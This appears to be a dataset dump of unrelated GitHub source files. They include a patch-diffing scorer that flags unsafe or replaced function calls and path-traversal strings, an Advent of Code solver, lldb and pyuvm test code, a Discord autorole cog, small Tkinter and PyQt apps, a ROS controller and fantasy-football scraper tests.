[(compare.compare.TypesOfChanges.CHANGED, 15, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 40, compare.compare.NEWEST),\n ]\n\n # TODO: add overflow/underflow CWE score.\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_is_int_safe_functions):\n yield score\n\n\nclass DeprecatedFunctions(features.feature.SimpleFunctionFeature):\n # https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/jj635743(v=vs.85)\n METHOD_NAME = \"DeprecatedFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 20, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, -5, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 30, compare.compare.OLDEST)\n ]\n\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_function_is_deprecated):\n yield score\n\n# ###################### by parsing the name ############################\n\n\nclass XrefLockFunction(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"XrefLockFunction\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 30, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 15, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 5, compare.compare.OLDEST)\n ]\n for score in score_xref_function_name(type(self), compare_object, scores,\n naming_parsing.is_name_related_to_sync,\n relevant_cwes=[411]):\n yield score\n\n\nclass FreeFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"FreeFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 20, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 15, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 10, compare.compare.OLDEST)\n ]\n\n # TODO: add CWE score.\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_related_memory_free):\n yield score\n\n\nclass AllocFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"AllocFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 20, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 15, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 10, compare.compare.OLDEST)\n ]\n\n # TODO: add CWE score.\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_related_memory_allocation):\n yield score\n\n\n# ########################### Mappings #############################################\n\n\nclass ReplacedLogicalFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"ReplacedLogicalFunctions\"\n\n def __init__(self):\n \"\"\"\n Looks for functions replaced from PathCombine to PathCchCombine\n \"\"\"\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n base_score = 75\n for score in score_mapping_replaced_functions(type(self), compare_object, base_score,\n features.function_features.naming_parsing.replaced_logical_vulnerable_function):\n yield score\n\n\nclass ReplacedVulnerableFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"ReplacedVulnerableFunctions\"\n\n def __init__(self):\n \"\"\"\n looks for functions such as strcmp to strcmp_s\n \"\"\"\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n base_score = 70\n for score in score_mapping_replaced_functions(type(self), compare_object, base_score,\n features.function_features.naming_parsing.replaced_vulnerable_function):\n yield score\n\n\nclass ReplacedSimilarFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"ReplacedSimilarFunctions\"\n\n def __init__(self):\n \"\"\"\n looks for functions with a similar name (not known functions )\n \"\"\"\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n base_score = 40\n for score in score_mapping_replaced_functions(type(self), compare_object, base_score,\n features.function_features.naming_parsing.replaced_similar_functions):\n yield score\n \n\nclass DirectoryTraversal(features.feature.FunctionFeature):\n METHOD_NAME = \"DirectoryTraversal\"\n\n def __init__(self):\n number_of_compared_objects = 2\n self.compatible_functions = [\"wcsstr\", \"strstr\", \"StrStrIW\"]\n changes = [compare.compare.TypesOfChanges.CHANGED, compare.compare.TypesOfChanges.ADDED]\n group_by = features.groupby.GroupByChangedFunctions(number_of_compared_objects,\n get_changes=lambda x: x.get_multiple_changes(changes))\n super().__init__(type(self).METHOD_NAME, number_of_compared_objects, group_by)\n\n def is_compatible_func(self, found_function_name):\n for referenced_func_name in self.compatible_functions:\n if features.function_features.naming_parsing.compare_names(found_function_name, referenced_func_name, False):\n return True\n return False\n\n def _score(self, compare_object):\n func_obj = compare_object.objects_to_compare[compare.compare.NEWEST]\n if func_obj is None:\n return\n\n called_funcs = func_obj.get_arguments_called_functions()\n for ea, function_calls in called_funcs.items():\n for function_call in function_calls:\n isEquals = self.is_compatible_func(function_call['name'])\n if isEquals:\n args = features.function_features.changed_constants.extract_const_from_function_call(function_call)\n for arg in args:\n if arg is not None and (\"../\" == arg or \"..\\\\\"==arg):\n yield core.score.Score(80, type(self), [func_obj], type_of_change=compare_object.type_of_change, arg=\"../\", args=args)\n else:\n yield core.score.Score(5, type(self), [func_obj], type_of_change=compare_object.type_of_change, args=args)\n","repo_name":"SafeBreach-Labs/Back2TheFuture","sub_path":"features/function_features/xrefs.py","file_name":"xrefs.py","file_ext":"py","file_size_in_byte":16863,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"66"} +{"seq_id":"18647356133","text":"rom = list(map(str.rstrip, open('d8.txt')))\n\ndef run(rom, patch):\n pc = 0\n a = 0\n nsteps = 0\n while pc < len(rom) and nsteps < len(rom):\n nsteps += 1\n op, arg = rom[pc].split(' '); arg = int(arg)\n if pc == patch:\n if op == 'jmp': op = 'nop'\n elif op == 'nop': op = 'jmp'\n # print(f'{pc:4} ({a:3}): {op} {arg}')\n if op == 'acc':\n a += arg\n pc += 1\n elif op == 'jmp':\n pc += arg\n continue\n elif op == 'nop':\n pc += 1\n\n return pc == len(rom), a\n\nfor cur_pc, line in enumerate(rom):\n terminated, a = run(rom, patch=cur_pc)\n if terminated:\n print(f'found {cur_pc} {a}')\n break","repo_name":"jogloran/advent-of-code-2020","sub_path":"d8b.py","file_name":"d8b.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5747337247","text":"import functools\nimport inspect\n\nimport cocotb\n\nfrom pyuvm import uvm_root\n\n\ndef test(\n timeout_time=None,\n timeout_unit=\"step\",\n expect_fail=False,\n expect_error=(),\n skip=False,\n stage=None,\n):\n version_info = tuple(int(n) for n in cocotb.__version__.split(\".\"))\n if version_info >= (1, 7, 0) and stage is None:\n stage = 0\n\n def decorator(cls):\n\n # create cocotb.test object to be picked up RegressionManager\n @cocotb.test(\n timeout_time=timeout_time,\n timeout_unit=timeout_unit,\n expect_fail=expect_fail,\n expect_error=expect_error,\n skip=skip,\n stage=stage,\n )\n @functools.wraps(cls)\n async def test(_):\n await uvm_root().run_test(cls)\n\n # adds cocotb.test object to caller's module\n caller_frame = inspect.stack()[1]\n caller_module = inspect.getmodule(caller_frame[0])\n setattr(caller_module, f\"test_{test._id}\", test)\n\n # returns decorator class unmodified\n return cls\n\n return decorator\n","repo_name":"georgereuben/RTL-Project","sub_path":"pyuvm-master/pyuvm/extension_classes.py","file_name":"extension_classes.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27392177532","text":"from . import ProcessFunctionsTestCase\nfrom src.longhorn.config import TestingConfig\nfrom src.longhorn.process.process_functions import Process\n\n\nclass CreateProcessTestCase(ProcessFunctionsTestCase):\n def test_create_process_creates_process(self):\n test_process = Process(\n self.event_text,\n TestingConfig.PROCESS_FILE,\n TestingConfig.PROCESS_TTL,\n _ut=True,\n )\n test_process.create_process()\n with open(TestingConfig.PROCESS_FILE, \"rt\") as process_file:\n self.assertIn(test_process.process_id, process_file.read())\n test_process.delete_process()\n","repo_name":"WhaleJ84/longhorn","sub_path":"test/test_process/test_create_process.py","file_name":"test_create_process.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35790812071","text":"\"\"\"IRC log file format definitions.\"\"\"\n# pylint: disable=invalid-name,line-too-long\n\n\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\nfrom builtins import *\n\nimport re\n\n\ndef c(regex):\n \"\"\"A convenience alias for anchoring and compiling *regex*.\"\"\"\n return re.compile(r'^{}$'.format(regex))\n\n\n#: A dict mapping supported formats to their rules.\nformats = {\n 'omnipresence': {\n 'line': c(r'\\[(?P.*?)\\] (?P.*)'),\n 'timestamp': '%d-%b-%Y %H:%M:%S',\n 'privmsg': c(r'<(?P.*?)> (?P.*)'),\n 'action': c(r'\\* (?P.*?) (?P.*)'),\n 'notice': c(r'-(?P.*?)- (?P.*)'),\n 'nick': c(r'\\*\\*\\* (?P.*?) is now known as (?P.*?)'),\n 'join': c(r'\\*\\*\\* (?P.*?) <(?P.*?)> has joined (?P.*?)'),\n 'part': c(r'\\*\\*\\* (?P.*?) <(?P.*?)> has left (?P.*?)'),\n 'quit': c(r'\\*\\*\\* (?P.*?) <(?P.*?)> has quit IRC(?: \\((?P.*?)\\))?'),\n 'kick': c(r'\\*\\*\\* (?P.*?) was kicked by (?P.*?)(?: \\((?P.*?)\\))?'),\n 'topic': c(r'\\*\\*\\* (?P.*?) changes topic to (?P.*?)'),\n 'mode': c(r'\\*\\*\\* (?P.*?) sets mode: (?P.*?)'),\n },\n}\n","repo_name":"kxz/interstat","sub_path":"interstat/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21809066465","text":"#So a generator function returns an generator object that is iterable, i.e., can be used as an Iterators .\n\ndef giveNumbers():\n yield 1\n yield 2\n yield 3\n yield 4\n\n\nfor x in giveNumbers():\n print(x)","repo_name":"halfozone007/repoA","sub_path":"PythonProjects/QuickStart/6Generator.py","file_name":"6Generator.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11618458689","text":"\"\"\"\nTest lldb logging. This test just makes sure logging doesn't crash, and produces some output.\n\"\"\"\n\n\nimport os\nimport lldb\nfrom lldbsuite.test.decorators import *\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test import lldbutil\n\n\nclass LogTestCase(TestBase):\n NO_DEBUG_INFO_TESTCASE = True\n\n def setUp(self):\n super(LogTestCase, self).setUp()\n self.log_file = self.getBuildArtifact(\"log-file.txt\")\n\n def test_file_writing(self):\n self.build()\n exe = self.getBuildArtifact(\"a.out\")\n self.expect(\"file \" + exe, patterns=[\"Current executable set to .*a.out\"])\n\n if os.path.exists(self.log_file):\n os.remove(self.log_file)\n\n # By default, Debugger::EnableLog() will set log options to\n # PREPEND_THREAD_NAME + OPTION_THREADSAFE. We don't want the\n # threadnames here, so we enable just threadsafe (-t).\n self.runCmd(\"log enable -f '%s' lldb commands\" % (self.log_file))\n\n self.runCmd(\"command alias bp breakpoint\")\n\n self.runCmd(\"bp set -n main\")\n\n self.runCmd(\"bp l\")\n\n self.runCmd(\"log disable lldb\")\n\n self.assertTrue(os.path.isfile(self.log_file))\n\n with open(self.log_file, \"r\") as f:\n log_lines = f.read()\n os.remove(self.log_file)\n\n self.assertGreater(len(log_lines), 0, \"Something was written to the log file.\")\n\n # Check that lldb truncates its log files\n def test_log_truncate(self):\n # put something in our log file\n with open(self.log_file, \"w\") as f:\n for i in range(1, 1000):\n f.write(\"bacon\\n\")\n\n self.runCmd(\"log enable -f '%s' lldb commands\" % self.log_file)\n self.runCmd(\"help log\")\n self.runCmd(\"log disable lldb\")\n\n self.assertTrue(os.path.isfile(self.log_file))\n with open(self.log_file, \"r\") as f:\n contents = f.read()\n\n # check that it got removed\n self.assertEquals(contents.find(\"bacon\"), -1)\n\n # Check that lldb can append to a log file\n def test_log_append(self):\n # put something in our log file\n with open(self.log_file, \"w\") as f:\n f.write(\"bacon\\n\")\n\n self.runCmd(\"log enable -a -f '%s' lldb commands\" % self.log_file)\n self.runCmd(\"help log\")\n self.runCmd(\"log disable lldb\")\n\n self.assertTrue(os.path.isfile(self.log_file))\n with open(self.log_file, \"r\") as f:\n contents = f.read()\n\n # check that it is still there\n self.assertEquals(contents.find(\"bacon\"), 0)\n\n # Enable all log options and check that nothing crashes.\n @skipIfWindows\n def test_all_log_options(self):\n if os.path.exists(self.log_file):\n os.remove(self.log_file)\n\n self.runCmd(\n \"log enable -v -s -T -p -n -S -F -f '%s' lldb commands\" % self.log_file\n )\n self.runCmd(\"help log\")\n self.runCmd(\"log disable lldb\")\n\n self.assertTrue(os.path.isfile(self.log_file))\n","repo_name":"llvm/llvm-project","sub_path":"lldb/test/API/commands/log/basic/TestLogging.py","file_name":"TestLogging.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"8419852395","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nimport discord\nfrom asyncpg import UniqueViolationError\nfrom discord import app_commands, Interaction, Role\nfrom src.features.autorole.services import convert_schemas_to_role_objects\n\nfrom src.features.autorole.ui import ConfirmSyncModal\n\nif TYPE_CHECKING:\n from src.bot import AmeliaBot\n\n \nclass AutoRoleConfig(app_commands.Group):\n def __init__(self, bot: AmeliaBot):\n super().__init__(\n name='autorole',\n description='Configuration commands for AutoRole'\n )\n self.bot = bot\n\n @app_commands.command(\n name='add-role', \n description='Adds a role that will automatically be assigned on member join'\n )\n @app_commands.describe(role=\"The role to auto-assign\")\n @app_commands.checks.has_permissions(manage_roles=True)\n async def add_auto_role(self, itx: Interaction, role: Role):\n assert itx.guild_id is not None\n async with self.bot.db as session:\n await session.auto_roles.add_auto_role(itx.guild_id, role.id)\n await session.commit()\n response = f\"{role.name} Added to auto roles. Note that this will not sync automatically. To sync,\" \\\n f\"please run the sync command specifically\"\n await itx.response.send_message(response, ephemeral=True)\n\n @add_auto_role.error\n async def on_add_error(self, itx: Interaction, error: app_commands.AppCommandError):\n unwrapped_error = error.original if isinstance(error, app_commands.errors.CommandInvokeError) else error\n if isinstance(unwrapped_error, UniqueViolationError):\n await itx.response.send_message(\"This role is already added.\", ephemeral=True)\n else:\n await itx.response.send_message(\"Role not added. Unknown error\", ephemeral=True)\n raise error\n\n @app_commands.command(name='remove-role', description=\"Removes a role from automatically assigning to new members\")\n @app_commands.describe(role=\"The role to unassign\")\n @app_commands.checks.has_permissions(manage_roles=True)\n async def remove_autorole(self, itx: Interaction, role: discord.Role):\n async with self.bot.db as session:\n await session.auto_roles.remove_auto_role(role.id)\n await session.commit()\n await itx.response.send_message(f\"{role.name} is no longer an auto-role\", ephemeral=True)\n\n @app_commands.command(name='list-roles', description=\"Lists the roles that are set to automatically assign\")\n @app_commands.checks.has_permissions(manage_roles=True)\n async def list_autorole(self, itx: Interaction):\n assert itx.guild is not None\n async with self.bot.db as session:\n schemas = await session.auto_roles.guild_auto_roles(itx.guild.id)\n roles = convert_schemas_to_role_objects(itx.guild, schemas)\n names = '\\n'.join(r and r.mention for r in roles) or 'No Roles'\n embed = discord.Embed(title=\"Auto-Roles\", description=names)\n await itx.response.send_message(embed=embed, ephemeral=True)\n\n @app_commands.command(name='sync', description=\"Sync all auto-roles to members in the guild\")\n @app_commands.checks.has_permissions(manage_roles=True)\n async def sync(self, itx: Interaction):\n await itx.response.send_modal(ConfirmSyncModal(self))","repo_name":"dfitzpatrick/amelia","sub_path":"src/features/autorole/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"20386761103","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 20 16:00:22 2016\n\n@author: rod\n\nDescription:\nAssume s is a string of lower case characters.\n\nWrite a program that counts up the number of vowels contained in the string s. \nValid vowels are: 'a', 'e', 'i', 'o', and 'u'. \nFor example, if s = 'azcbobobegghakl', your program should print:\nNumber of vowels: 5\n\"\"\"\ns = 'azcbobobegghakl'\ncount = 0\nx = s.lower()\nvowels = {\"a\", \"e\", \"i\", \"o\", \"u\"}\nfor letter in x:\n if letter in vowels:\n count +=1\nprint(\"Number of vowels: \" + str(count))","repo_name":"StudentOfJS/MITx6.0","sub_path":"ps1-problem1.py","file_name":"ps1-problem1.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4301169038","text":"from tkinter import *\r\nfrom PIL import ImageTk, Image\r\n\r\nroot = Tk()\r\nroot.geometry(\"1920x1080\")\r\nroot.title(\"NCT 1 Times\")\r\nNewspaperName= Label(text=\"NCT 1 Times\", font=(\"Times New Roman\", 50, \"bold\"), bg=\"grey\",borderwidth= 5, relief=RIDGE)\r\nNewspaperName.pack(side=TOP, fill=X)\r\n\r\nimg1 = ImageTk.PhotoImage(Image.open(\"1.jpg\"))\r\nimg1_label=Label(image=img1)\r\nimg1_label.pack(side=LEFT, anchor=\"nw\", padx=200)\r\n\r\ntxt1= Label(text='''Text messaging, or texting, is the act of composing and sending electronic messages, typically consisting \\nof alphabetic and numeric characters, between two or more users of mobile devices, desktops/laptops, or \\nanother type of compatible computer. Text messages may be sent over a cellular network, or may also be\\n sent via an Internet connection. The term originally referred to messages sent using the Short Message \\nService (SMS).''', font=(\"Times New Roman\", 12))\r\ntxt1.pack(side=LEFT, anchor=\"w\")\r\n\r\n\r\n\r\n\r\n\r\n\r\nroot.mainloop()","repo_name":"abhoygorai/MyLearning","sub_path":"Tkinter/Newspaper.py","file_name":"Newspaper.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37560065489","text":"import sqlite3\nfrom .filesys import exRm\n\nclass DatabaseManager(object):\n def __init__(self, db, remove):\n dbFname = db+'.db'\n self.sqlFile = None\n if remove:\n exRm(dbFname)\n self.conn = sqlite3.connect(dbFname)\n self.conn.text_factory = str\n self.conn.row_factory = lambda cursor, row: row[0]\n self.conn.execute('pragma foreign_keys = on')\n self.conn.commit()\n self.cur = self.conn.cursor()\n\n def readSql(self,file):\n self.instF = open(file,'r')\n self.instSQL = ''\n for l in self.instF:\n self.instSQL = self.instSQL+l\n return self.instSQL\n\n def query(self,q,fo=False):\n if q.count(';') > 1:\n self.cur.executescript(q)\n elif q.count(';') <= 1 and fo == False:\n self.cur.execute(q)\n else:\n self.foq = self.cur.execute(q)\n self.conn.commit()\n return self.foq.fetchone() if fo else list(self.cur)\n\n def index(self,tableName,field):\n iQuery = \"\"\n for i in field:\n idxQuery = \"CREATE INDEX idx_\"+i+\"_\"+tableName+\" ON \"+tableName+\" (\"+i+\" ASC);\"\n iQuery = iQuery + idxQuery+'\\n'\n iQuery = iQuery[:-1]\n self.query(iQuery)\n return iQuery\n\n def nullValue(self,string,is_int=False):\n if string=='':\n return 'NULL'\n elif string !='' and is_int==False:\n return '\\''+str(string)+'\\''\n elif string !='' and is_int==True:\n return string\n\n def sqlQuotes(self,string):\n return string.replace(\"'\",\"''\")\n \n\n def __del__(self):\n self.conn.close()\n","repo_name":"Myst3ri0n/reddit-save-saved","sub_path":"gcore/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8912875450","text":"import PySimpleGUI as s\r\nimport file\r\n\r\n\r\nlist = []\r\ndone = []\r\nlist = file.readFile()\r\ndone = file.readCompleted()\r\nlayout = [[s.Text(\"TODO LIST \")],[s.Text(\"New Event : \"),s.InputText(\"\",key = \"data\")],\r\n [s.CalendarButton(\"Choose Date\", target=\"dispDate\", key='date'),s.InputText(\"\",key = \"dispDate\", disabled=True ,do_not_clear=False)],\r\n [s.Text(\"LIST : \"), s.Listbox(values=list,key = \"list\",size=(40,6), enable_events=True), s.Text(\"FINISHED : \"), s.Listbox(values=done,key = \"complete\",size=(40,6), enable_events=True)],\r\n [s.Slider(range=(10,1,-1),default_value=1,orientation=\"horizontal\",key=\"priority\")],\r\n [s.Button(\"add\"),s.Button(\"delete\"),s.Button(\"prioritize\"),s.Button(\"finished\")],\r\n [s.Text(\"\", auto_size_text=False, key=\"tell\")]]\r\n\r\nwindow = s.Window(\"my first GUI \", layout)\r\n\r\nwhile True:\r\n event, value = window.Read()\r\n if (event == \"add\"):\r\n if(value[\"dispDate\"] == \"\"):\r\n window.Element(\"error\").Update(\"Please input a date\")\r\n continue\r\n if (value[\"data\"] == \"\"):\r\n window.Element(\"error\").Update(\"Please enter a value\")\r\n continue\r\n\r\n x = value[\"data\"]+\" \"+value[\"dispDate\"]+\" \"+str(int(value[\"priority\"]))\r\n list.append(x)\r\n window.FindElement(\"list\").Update(list)\r\n window.Element(\"tell\").Update(\"entry added\")\r\n file.writeFile(list) #working\r\n\r\n elif( event == \"delete\"):\r\n list.remove(''.join(value[\"list\"]))\r\n window.FindElement(\"list\").Update(list)\r\n window.Element(\"tell\").Update(\"entry deleted\")\r\n file.writeFile(list) #working\r\n\r\n elif( event == \"prioritize\"):\r\n for i in range(len(list)):\r\n min = i\r\n for j in range(i+1, len(list)):\r\n if(list[min][-1] > list[j][-1]):\r\n min = j\r\n list[i],list[min] = list[min],list[i]\r\n window.FindElement(\"list\").Update(list)\r\n window.Element(\"tell\").Update(\"prioritized\")\r\n file.writeFile(list) #working\r\n\r\n elif( event == \"finished\"):\r\n list.remove(''.join(value[\"list\"]))\r\n done.append(''.join(value[\"list\"]))\r\n window.FindElement(\"list\").Update(list)\r\n window.FindElement(\"complete\").Update(done)\r\n window.Element(\"tell\").Update(\"item completed\")\r\n file.writeCompleted(done) #working\r\n\r\n\r\nwindow.Close()\r\n","repo_name":"KRITHIKVASAN/_programs_","sub_path":"todolist_using_file_concept.py","file_name":"todolist_using_file_concept.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26743481346","text":"import tkinter as tk\r\nimport datetime\r\nimport winsound\r\n\r\ndef set_alarm():\r\n alarm_time = entry.get()\r\n try:\r\n alarm_hour = int(alarm_time[:2])\r\n alarm_minute = int(alarm_time[3:])\r\n now = datetime.datetime.now()\r\n alarm = now.replace(hour=alarm_hour, minute=alarm_minute, second=0, microsecond=0)\r\n time_difference = alarm - now\r\n if time_difference.total_seconds() < 0:\r\n alarm = alarm.replace(day=alarm.day + 1)\r\n time_difference = alarm - now\r\n status_label.config(text=f\"Alarm set for {alarm_time}\")\r\n root.after(int(time_difference.total_seconds() * 1000), play_alarm)\r\n except ValueError:\r\n status_label.config(text=\"Invalid time format!\")\r\n\r\ndef play_alarm():\r\n winsound.PlaySound(\"sound.wav\", winsound.SND_ASYNC)\r\n status_label.config(text=\"Wake up!\")\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Alarm Clock\")\r\n\r\nlabel = tk.Label(root, text=\"Enter alarm time (HH:MM):\")\r\nlabel.pack()\r\n\r\nentry = tk.Entry(root)\r\nentry.pack()\r\n\r\nbutton = tk.Button(root, text=\"Set Alarm\", command=set_alarm)\r\nbutton.pack()\r\n\r\nstatus_label = tk.Label(root, text=\"\")\r\nstatus_label.pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"inferno00134/alarm-clock-using-GUI-codeclause","sub_path":"GUI.py/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73809283410","text":"#!/usr/bin/python\n\nimport rospy\nfrom nav_msgs.msg import Odometry\nfrom tf.transformations import euler_from_quaternion as euler_fq\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import Twist\nfrom geometry_msgs.msg import PointStamped\nfrom geometry_msgs.msg import PoseStamped\nimport numpy as np\nfrom math import atan2\n\n\nx = 0.0\ny = 0.0\ntheta = 0.0\n\nu_0 = [0.0, 0.0]\n\nx_odom = 0.0\ny_odom = 0.0\n\n\n# Callbak function\ndef newPos(msg) :\n\n print(\"newPos Callback\")\n global x\n global y\n global theta\n\n x = msg.pose.position.x\n y = msg.pose.position.y\n\n rot_q = msg.pose.orientation\n (roll, pitch, theta) = euler_fq([rot_q.x, rot_q.y, rot_q.z, rot_q.w])\n #theta = yaw;\n\n# Callbak function\ndef newOdom(msg) :\n global x_odom\n global y_odom\n global theta_odom\n\n x_odom = msg.pose.pose.position.x\n y_odom = msg.pose.pose.position.y\n\n rot_q = msg.pose.pose.orientation\n (roll, pitch, theta_odom) = euler_fq([rot_q.x, rot_q.y, rot_q.z, rot_q.w])\n #theta = yaw;\n\nrospy.init_node(\"position_controller\")\n\nsub_pos = rospy.Subscriber(\"/slam_out_pose\", PoseStamped, newPos)\nsub = rospy.Subscriber(\"/odom\", Odometry, newOdom)\n\npub = rospy.Publisher(\"/cmd_vel\", Twist, queue_size=1)\n\nspeed = Twist()\n\nh = 1\nrate = rospy.Rate(1/h)\n\nwhile not rospy.is_shutdown():\n try:\n # if x > 2:\n # speed.linear.x = 0.0\n # else:\n # \n speed.linear.x = 0.0\n speed.angular.z = 1.0\n except(ValueError, TypeError):\n speed.linear.x = 0.0\n speed.angular.z = 0.0\n pub.publish(speed)\n rate.sleep()","repo_name":"filipkro/hrp_mpc_lidar","sub_path":"mpc1/src/test_params.py","file_name":"test_params.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8094410812","text":"'''\n\n# tests/test_espn_fantasy.py\n\n'''\n\nimport logging\nimport os\nimport random\nimport sys\nimport unittest\n\nfrom nflfantasy.espn_fantasy import Scraper, Parser\n\n\nclass ESPN_fantasy_test(unittest.TestCase):\n '''\n Tests espn_fantasy scraper and parser\n '''\n\n @property\n def pos(self):\n return random.choice(['qb', 'rb', 'wr', 'k', 'te'])\n\n def offset(self, pos=None):\n if not pos:\n pos = self.pos\n if pos == 'k':\n return 0\n elif pos in ['qb', 'te']:\n return random.choice([0, 50])\n else:\n return random.choice([0, 50, 100])\n\n def setUp(self):\n \"\"\"\n\n \"\"\"\n self.s = Scraper(username=os.getenv('ESPN_FANTASY_USERNAME'),\n password=os.getenv('ESPN_FANTASY_PASSWORD'),\n profile=os.getenv('FIREFOX_PROFILE'))\n self.p = Parser()\n self.leagueId = os.getenv('ESPN_FANTASY_LEAGUE_ID')\n self.teamId = os.getenv('ESPN_FANTASY_TEAM_ID')\n self.seasonId = os.getenv('ESPN_FANTASY_SEASON_ID')\n\n @unittest.skip\n def test_fantasy_league_rosters(self):\n content = self.s.fantasy_league_rosters(self.leagueId)\n self.assertIsNotNone(content)\n self.assertIn('QB', content)\n players = self.p.fantasy_league_rosters(content)\n self.assertIsNotNone(players)\n\n @unittest.skip\n def test_fantasy_team_roster(self):\n content = self.s.fantasy_team_roster(league_id=self.leagueId,team_id=self.teamId, season=self.seasonId)\n self.assertIn('Acquisitions', content)\n players = self.p.fantasy_team_roster(content)\n self.assertIsNotNone(players)\n\n @unittest.skip\n def test_waiver_wire(self):\n # league_id, team_id, season\n content = self.s.fantasy_waiver_wire(self.leagueId, self.teamId, self.seasonId)\n self.assertIn('/ffl/freeagency?', content)\n\n # league_id, team_id, season, start_index=None\n pos = self.pos\n content = self.s.fantasy_waiver_wire(self.leagueId, self.teamId, self.seasonId, self.offset())\n self.assertIn('/ffl/freeagency?', content)\n\n # league_id, team_id, season, start_index=None, position=None\n pos = self.pos\n content = self.s.fantasy_waiver_wire(self.leagueId, self.teamId, self.seasonId, self.offset(pos), pos)\n self.assertIn('/ffl/freeagency?', content)\n\n players = self.p.fantasy_waiver_wire(content)\n self.assertIsNotNone(players)\n\n\nif __name__=='__main__':\n logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n unittest.main()\n","repo_name":"sansbacon/nflfantasy","sub_path":"tests/test_espn_fantasy.py","file_name":"test_espn_fantasy.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"21802126259","text":"import sys\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton\nfrom PyQt5 import QtCore\n\nclass Window(QMainWindow):\n \n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 500, 300)\n self.setWindowTitle(\"Test example 1\")\n self.home()\n \n def home(self):\n btn = QPushButton(\"Quit\", self)\n btn.clicked.connect(QtCore.QCoreApplication.instance().quit)\n self.show()\n \n \ndef run():\n app = QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n \n 